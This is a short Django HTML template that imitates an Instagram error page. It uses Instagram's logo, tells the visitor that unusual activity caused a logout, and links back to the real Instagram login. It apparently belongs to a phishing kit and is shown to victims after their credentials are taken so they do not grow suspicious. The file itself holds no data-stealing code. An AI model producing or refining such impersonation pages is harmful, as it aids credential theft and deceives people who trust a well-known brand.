{%load static%}
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Error</title>
    <link rel="stylesheet" href="{%static 'styleerror.css'%}">
</head>

<body>
    <div class="main">
        <div class="messagecard">
            <div class="header">
                <img class="logo"
                    src="https://upload.wikimedia.org/wikipedia/commons/thumb/2/2a/Instagram_logo.svg/1200px-Instagram_logo.svg.png"
                    alt="Instagram">
            </div>
            <div class="line"></div>
            <div class="errormessage">
                <h2>Oops!</h2>
                <p>We noticed unusual activity from your account so we've logged you out.</p>
                <p>TO secure this account, we request you to try logging in again.</p>
            </div>
            <a href="https://www.instagram.com/accounts/login/">&lt back</a>
        </div>
    </div>


</body>

</html>